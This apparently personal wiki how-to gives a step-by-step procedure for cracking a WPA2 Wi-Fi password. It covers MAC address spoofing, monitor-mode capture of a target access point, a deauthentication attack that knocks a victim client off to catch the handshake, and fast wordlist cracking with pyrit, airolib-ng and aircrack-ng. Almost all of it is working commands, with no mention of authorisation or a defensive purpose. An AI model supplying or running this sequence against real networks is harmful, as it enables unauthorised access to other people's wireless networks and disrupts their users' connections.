How-To: WPA2 Attacking

Get the network set up

ifconfig wlan0 down
macchanger -m MA:CA:DD:RE:SS wlan0
airmon-ng start wlan0
airodump-ng mon0

Note channel #
Note mac address (BSSID) of AP
airmon-ng stop mon0
airmon-ng start wlan0 6    (channel #)
airodump-ng -c 6 --bssid xx:xx:xx:yy:yy:yy -w blah mon0    (bssid of AP)

(Do not capture just IV's, get all of it! do not do —output-format ivs)
(also keep this running, do not turn it off)
(also can filter by adding —encrypt wpa this will get WPA/WPA2 shit)
aireplay-ng -0 5 -a xx:xx:xx:yy:yy:yy -c vi:ti:ma:ca:dd:rs mon0

(in airodump-ng look for WPA handshake messages in top right corner)
pyrit -e ap_name create_essid
pyrit -f dictionary.txt import_passwords
pyrit batchprocess
aircrack-ng -w dictionarylist.txt blah.cap   (slow)

(this is a quick way for checking if you have captured any IV/WPA handshakes)
(for the lazy: aircrack-ng -w dictionarylist.txt *.cap)
Now for speed!
airolib-ng testdb -import essid ap_name

(normal to say "Could not open file/stream for reading.")
pyrit -e ap_name -o testdb export_hashdb

Shit itself: sqlite3.OperationalError: SQL logic error or missing database
I read, 2 gig file size limit…. perhaps break up wpa.txt into smaller parts??
So I backed up and used /pentest/passwords/wordlists/darkc0de.lst
No problem with this on HD install.
aircrack-ng -r testdb blah.cap  (fuckin fast! 20 seconds!)

also try:
pyrit -r blah.cap -e MyOtherNetwork testdb

To watch for EAPOL's:
tcpdump -ni eth0 -e ether proto 0x888e
tcpdump -r wpa.full.cap -e ether proto 0x888e
Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-NonCommercial-ShareAlike 3.0 License